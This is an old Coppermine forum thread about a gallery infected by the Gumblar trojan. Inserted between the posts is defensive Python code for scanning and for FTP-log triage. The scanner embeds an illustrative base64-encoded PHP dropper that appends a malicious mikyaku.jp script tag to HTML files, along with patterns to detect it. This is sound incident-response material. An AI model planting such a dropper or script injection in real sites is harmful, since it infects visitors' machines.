
Author Topic: Trojans on 1.4.25  (Read 2743 times)


bjfs

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Trojans on 1.4.25
« on: October 25, 2009, 09:18:19 pm »

So I had a gallery (currently taken down) on 1.4.25 with register globals turned off and for some odd reason the PHP files got infected with this sinister code:

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


Which decodes to evaluation of some nasty site-wide infections of HTML, HTM and JS files with a link to a trojan in the mikyaku.jp domain.

The only mod I used was the captcha one. I tried many things, upgrading from 1.4.34 (wiping the whole code first, where only albums remain) and realising that the host had register globals on by default.

I'm tired of cleaning the site with global search and replace, re-installing and having the incident happen again after a week or two. Maybe 1.5 will be better  :P

There is no link because the gallery is dead.
Logged
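The cleanup this post describes ("global search and replace") is the kind of job a small scanner can automate. What follows is an added example, not code from the original post or from the Coppermine project: it walks a web root, flags PHP files containing an eval(base64_decode('...')) block, decodes the blob to see whether it references the mikyaku.jp domain named above, and flags HTML/HTM/JS files that reference that domain directly. The sample files it writes to a temporary directory are constructed for the example, and the embedded dropper body is an illustrative stand-in, not the code that was removed from the post.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

MALICIOUS_DOMAIN = "mikyaku.jp"                    # domain named in the thread
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}   # file types the post says were touched

# Matches eval(base64_decode('...')) and captures the base64 blob.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)"
)

# ---- constructed sample content (not the code from the original post) ----
CLEAN_PHP = "<?php\necho 'Gallery closed for maintenance';\n"
# Stand-in dropper body: appends a script tag pointing at the malicious domain
# to every .html file it can see. Illustrative only.
PAYLOAD = (
    "foreach (glob('*.html') as $f) { file_put_contents($f, "
    "'<script src=\"http://mikyaku.jp/x.js\"></script>', FILE_APPEND); }"
)
INFECTED_PHP = (
    "<?php eval(base64_decode('"
    + base64.b64encode(PAYLOAD.encode()).decode()
    + "')); ?>\n"
    + CLEAN_PHP
)
INFECTED_HTML = (
    "<html><body>closed</body></html>\n"
    '<script src="http://mikyaku.jp/x.js"></script>\n'
)
CLEAN_JS = "function ready() { return true; }\n"


def decode_payload(blob):
    """Decode a captured base64 blob; return None if it is not valid base64."""
    try:
        raw = base64.b64decode("".join(blob.split()), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def scan_file(path):
    """Return a list of findings for one file (empty if nothing matched)."""
    text = path.read_text(encoding="utf-8", errors="replace")
    findings = []
    for m in EVAL_B64.finditer(text):
        decoded = decode_payload(m.group(1))
        findings.append({
            "kind": "eval_base64",
            "offset": m.start(),
            "decoded_preview": (decoded or "")[:80],
            "decoded_mentions_domain": bool(decoded and MALICIOUS_DOMAIN in decoded),
        })
    if MALICIOUS_DOMAIN in text:
        findings.append({"kind": "domain_reference", "offset": text.find(MALICIOUS_DOMAIN)})
    return findings


def scan_tree(root):
    """Walk a web root; map relative path -> findings for flagged files only."""
    root = Path(root)
    report = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            found = scan_file(p)
            if found:
                report[p.relative_to(root).as_posix()] = found
    return report


def make_sample_tree():
    """Write the constructed sample files to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="cpg_scan_"))
    (root / "include").mkdir()
    (root / "index.php").write_text(INFECTED_PHP)
    (root / "include" / "closed.php").write_text(CLEAN_PHP)
    (root / "index.html").write_text(INFECTED_HTML)
    (root / "ready.js").write_text(CLEAN_JS)
    return root


if __name__ == "__main__":
    for rel, found in scan_tree(make_sample_tree()).items():
        for f in found:
            extra = f"  decoded: {f['decoded_preview']!r}" if f["kind"] == "eval_base64" else ""
            print(f"{rel}: {f['kind']} at byte {f['offset']}{extra}")
```

Run it against the real document root instead of the sample tree by calling scan_tree("/path/to/public_html"). Decoding the blob matters: the raw PHP file does not contain the domain string, so a plain grep for mikyaku.jp would miss the dropper and only catch the HTML it had already modified.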

phill104

  • Administrator
  • Coppermine addict
  • *****
  • Country: gb
  • Offline Offline
  • Gender: Male
  • Posts: 4886
    • Windsurf.me
Re: Trojans on 1.4.25
« Reply #1 on: October 25, 2009, 09:41:40 pm »

Coppermine may not be the route the hackers got in. There are many methods. What other PHP-driven software do you have installed? Have you been a victim of an attack before and not fully cleaned up? Are you on a shared host where somebody else's site was the one at risk but the scumbag managed access to the whole server? As you can see, it is very hard to see exactly where the problem occurred without more information.

If possible, get your host to check the server logs as these should help track down where the leak was. If it can be shown that Coppermine was the point of entry, please post details here so we can look into it.
Logged
It is a mistake to think you can solve any major problems just with potatoes.

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Trojans on 1.4.25
« Reply #2 on: October 26, 2009, 07:45:20 am »

Sounds like the Trojan Gumblar in action on your site (I figured this out searching for mikyaku.jp, which led to http://www.malwaredomainlist.com/update.php). While it's sad to hear that your site got infected, there is no saying how the attack was carried out, so you can not (yet) blame Coppermine as the weakness where the attacker got in.

Here are some articles on Gumblar:
To me it seems that the attack is carried out using FTP access. In other words: the attackers retrieved your FTP data (maybe it was trivial, or your PC is infected and subsequently you have fallen victim to a keylogger). Therefore, it probably was not a weakness in Coppermine that let the attacker in. Please be very careful when blaming people for providing buggy code, especially if you don't have the skills to judge.

Joachim
Logged
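Both replies point at the server logs, and this one names stolen FTP credentials as the likely route. Added example (not from the original thread or the Coppermine project): a triage pass over FTP log lines that groups events by client address and user, and flags sessions from an address the site owner does not recognise that uploaded PHP/HTML/JS files. The log lines are constructed for the example in the style of a vsftpd log; the known-address set and the off-hours threshold are assumptions to adjust per site.

```python
import re
from datetime import datetime

# Assumption: the addresses the site owner normally uploads from (TEST-NET range here).
KNOWN_CLIENT_IPS = {"198.51.100.7"}
WEB_CODE = (".php", ".html", ".htm", ".js")
OFF_HOURS_BEFORE = 6   # assumption: logins before 06:00 server time are unusual for this owner

# Constructed log lines in the style of a vsftpd log; not taken from the thread.
LOG_LINES = """\
Sun Oct 25 19:02:11 2009 [pid 4101] [gallery] OK LOGIN: Client "198.51.100.7"
Sun Oct 25 19:03:40 2009 [pid 4101] [gallery] OK UPLOAD: Client "198.51.100.7", "/public_html/albums/userpics/10001/beach.jpg", 184331 bytes, 210.5Kbyte/sec
Mon Oct 26 03:12:11 2009 [pid 4388] [gallery] OK LOGIN: Client "203.0.113.45"
Mon Oct 26 03:12:15 2009 [pid 4388] [gallery] OK DOWNLOAD: Client "203.0.113.45", "/public_html/closed.php", 118 bytes, 30.0Kbyte/sec
Mon Oct 26 03:12:19 2009 [pid 4388] [gallery] OK UPLOAD: Client "203.0.113.45", "/public_html/closed.php", 2311 bytes, 45.1Kbyte/sec
Mon Oct 26 03:12:23 2009 [pid 4388] [gallery] OK UPLOAD: Client "203.0.113.45", "/public_html/index.html", 1440 bytes, 40.0Kbyte/sec
Mon Oct 26 08:30:02 2009 [pid 4512] [gallery] FAIL LOGIN: Client "203.0.113.45"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} \d{2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>LOGIN|UPLOAD|DOWNLOAD|DELETE): '
    r'Client "(?P<ip>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)


def parse_event(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%a %b %d %H:%M:%S %Y")
    return ev


def triage(lines, known_ips=KNOWN_CLIENT_IPS):
    """Group events by (client address, user) and flag sessions worth a closer look."""
    sessions = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        s = sessions.setdefault((ev["ip"], ev["user"]), {
            "ip": ev["ip"], "user": ev["user"], "logins": [],
            "failed_logins": 0, "uploads": [], "reasons": [], "suspicious": False,
        })
        if ev["action"] == "LOGIN":
            if ev["status"] == "OK":
                s["logins"].append(ev["ts"])
            else:
                s["failed_logins"] += 1
        elif ev["action"] == "UPLOAD" and ev["status"] == "OK":
            s["uploads"].append(ev["path"])

    for s in sessions.values():
        unknown = s["ip"] not in known_ips
        web_uploads = [p for p in s["uploads"] if p.lower().endswith(WEB_CODE)]
        if unknown:
            s["reasons"].append("login from an address not on the owner's list")
        if web_uploads:
            s["reasons"].append("uploaded web code: " + ", ".join(web_uploads))
        if any(t.hour < OFF_HOURS_BEFORE for t in s["logins"]):
            s["reasons"].append("off-hours login")
        # Only an unknown address that pushed web code is called suspicious;
        # the owner uploading a PHP file from home is normal.
        s["suspicious"] = unknown and bool(web_uploads)

    return sorted(sessions.values(), key=lambda s: (not s["suspicious"], s["ip"]))


if __name__ == "__main__":
    for s in triage(LOG_LINES.splitlines()):
        flag = "SUSPICIOUS" if s["suspicious"] else "ok"
        print(f"{flag:10} {s['ip']:15} user={s['user']} logins={len(s['logins'])} "
              f"failed={s['failed_logins']} uploads={len(s['uploads'])}")
        for r in s["reasons"]:
            print("           - " + r)
```

A successful login with the right password from an address the owner has never used, followed within seconds by a download-then-upload of the same PHP file, is the pattern a stolen-credential attack leaves: the attacker fetches the file, prepends the dropper and puts it back. That is also why re-installing Coppermine alone did not help the original poster; the credential, not the application, has to be rotated.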

bjfs

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: Trojans on 1.4.25
« Reply #3 on: October 26, 2009, 09:39:16 am »

Right. So the only PHP file left was just outputting the service closure text, and a few hours later the malicious code was again added to it. Oh well, this is what you get while having a shared host and sharing an account with other people. Make lame rants on society with a death wish after one is out of ideas. Ok, so I'm lame today. Happens ::)
Logged